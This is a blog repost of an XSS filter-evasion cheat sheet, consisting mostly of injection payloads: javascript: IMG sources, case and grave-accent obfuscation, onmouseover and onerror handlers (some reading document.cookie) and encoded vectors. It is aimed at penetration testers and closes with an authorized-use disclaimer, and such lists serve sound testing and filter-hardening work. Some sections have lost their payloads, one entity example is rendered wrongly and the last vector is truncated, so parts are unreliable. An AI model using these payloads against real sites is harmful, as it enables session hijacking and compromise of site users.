Cross Site Scripting Cheat Sheet

This cheat sheet is for people who already understand the basics of Cross Site Scripting (XSS) attacks but want a deep understanding of the nuances regarding filter evasion.

XSS Locator

Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word “XSS” will pop up. Use this URL encoding calculator to encode the entire string. Tip: if you’re in a rush and need to quickly check a page, often times injecting the depreciated “<PLAINTEXT>” tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably:


XSS Locator (short)

If you don’t have much space and know there is no vulnerable JavaScript on the page, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS verses &lt;XSS to see if it is vulnerable:


No Filter Evasion

This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here):

Image XSS using the JavaScript directive

Image XSS using the JavaScript directive (IE7.0 doesn’t support the JavaScript directive in context of an image, but it does in other contexts, but the following show the principles that would work in other tags as well:

<IMG SRC="javascript:alert('XSS');">

No quotes and no semicolon

<IMG SRC=javascript:alert('XSS')>

Case insensitive XSS attack vector

<IMG SRC=JaVaScRiPt:alert('XSS')>

HTML entities

The semicolons are required for this to work:

<IMG SRC=javascript:alert("XSS")>

Grave accent obfuscation

If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string – this is also useful because lots of cross site scripting filters don’t know about grave accents:

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

Malformed A tags

Skip the HREF attribute and get to the meat of the XXS… Submitted by David Cross ~ Verified on Chrome

<a onmouseover=”alert(document.cookie)”>xxs link</a>

or Chrome loves to replace missing quotes for you… if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.

<a onmouseover=alert(document.cookie)>xxs link</a>

Malformed IMG tags

Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag:

<IMG """>alert("XSS")">


If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need:

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

Default SRC tag to get past filters that check SRC domain

This will bypass most SRC domain filters. Inserting javascript in an event method will also apply to any HTML tag type injection that uses elements like Form, Iframe, Input, Embed etc. It will also allow any relevant event for the tag type to be substituted like onblur, onclick giving you an extensive amount of variations for many injections listed here. Submitted by David Cross .

Edited by Abdullah Hussam(@Abdulahhusam).

<IMG SRC=# onmouseover="alert('xxs')">

Default SRC tag by leaving it empty

<IMG SRC= onmouseover="alert('xxs')">

Default SRC tag by leaving it out entirely

<IMG onmouseover="alert('xxs')">

On error alert

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

IMG onerror and javascript alert encode

<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

Decimal HTML character references

all of the XSS examples that use a javascript: directive inside of an <IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode). Use the XSS Calculator for more information:

<IMG SRC=javascript:alert(

This post is for pen testers that are legally allowed to test software, do not try any of this on any live site without permission, as it is illegal.

Leave a Reply

Please log in using one of these methods to post your comment: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s